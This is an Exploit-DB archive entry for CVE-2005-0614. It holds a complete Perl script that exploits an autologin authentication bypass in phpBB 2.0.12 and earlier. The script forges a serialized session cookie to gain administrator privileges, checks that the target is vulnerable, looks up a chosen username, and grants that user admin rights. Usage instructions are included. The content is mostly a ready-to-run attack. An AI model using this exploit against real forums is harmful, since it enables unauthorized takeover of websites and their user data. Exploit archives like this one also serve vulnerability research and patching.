phpBB 2.0.12 - Change User Rights Authentication Bypass

EDB-ID:

889

CVE:

2005-0614

EDB Verified:

Author:

Kutas

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2005-03-21

Vulnerable App: 
#!/usr/bin/perl -w

# phpBB <=2.0.12 session autologin exploit
# This script uses the vulerability in autologinid variable 
# More: http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=267563
#
# Just gives an user on vulnerable forum administrator rights.
# You should register the user before using this ;-)
 
#   by Kutas, kutas@mail15.com
#P.S. I dont know who had made an original exploit, so I cannot place no (c) here...
# but greets goes to Paisterist who made an exploit for Firefox cookies...

if (@ARGV < 3)
 {
 print q(
 +++++++++++++++++++++++++++++++++++++++++++++++++++
 Usage: perl nenu.pl [site] [phpbb folder] [username] [proxy (optional)] 
 i.e. perl nenu.pl www.site.com /forum/ BigAdmin 127.0.0.1:3128
 ++++++++++++++++++++++++++++++++++++++++++++++++++++
           );   
 exit;
 } 
use strict;
use LWP::UserAgent;

my $host  = $ARGV[0];
my $path  = $ARGV[1];
my $user  = $ARGV[2];
my $proxy = $ARGV[3];
my $request = "http://";
$request .= $host;
$request .= $path; 
 

use HTTP::Cookies;
my $browser = LWP::UserAgent->new ();
my $cookie_jar = HTTP::Cookies->new( );
$browser->cookie_jar( $cookie_jar );
$cookie_jar->set_cookie( "0","phpbb2mysql_data", "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D", "/",$host,,,,,);
if ( defined $proxy) {
	$proxy =~ s/(http:\/\/)//eg;
	$browser->proxy("http" , "http://$proxy");
 }
 print "++++++++++++++++++++++++++++++++++++\n";
 print "Trying to connect to $host$path"; if ($proxy) {print "using proxy $proxy";}

my $response = $browser->get($request);
die "Error: ", $response->status_line
 unless $response->is_success;
 
if($response->content =~ m/phpbbprivmsg/) {
  print "\n   Forum is vulnerable!!!\n";
} else {
  print "Sorry... Not vulnerable"; exit();}

print "+++++++++++++++++++++++++++++\nTrying to get the user:$user ID...\n";
$response->content =~ /sid=([\w\d]*)/;
my $sid = $1;

$request .= "admin\/admin_ug_auth.php?mode=user&sid=$sid";
$response = $browser->post(
  $request,
  [
    'username'  => $user,
    'mode' => 'edit',
    'mode' => 'user',
    'submituser' => 'Look+up+User'
  ],
);
die "Error: ", $response->status_line
 unless $response->is_success;

if ($response->content =~ /name="u" value="([\d]*)"/) 
	{print "   Done... ID=$1\n++++++++++++++++++++++++++++++\n";}
   else {print "No user $user found..."; exit(); }	
my $uid = $1;
print "Trying to give user:$user admin status...\n";

$response = $browser->post(
  $request,
  [
    'userlevel'  => 'admin',
    'mode' => 'user',
    'adv'=>'',
    'u'=> $uid,
    'submit'=> 'Submit'
  ],
);
die "Error: ", $response->status_line
 unless $response->is_success;
print "   Well done!!! $user should now have an admin status..\n++++++++++++++++++++++++++++";

# milw0rm.com [2005-03-21]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services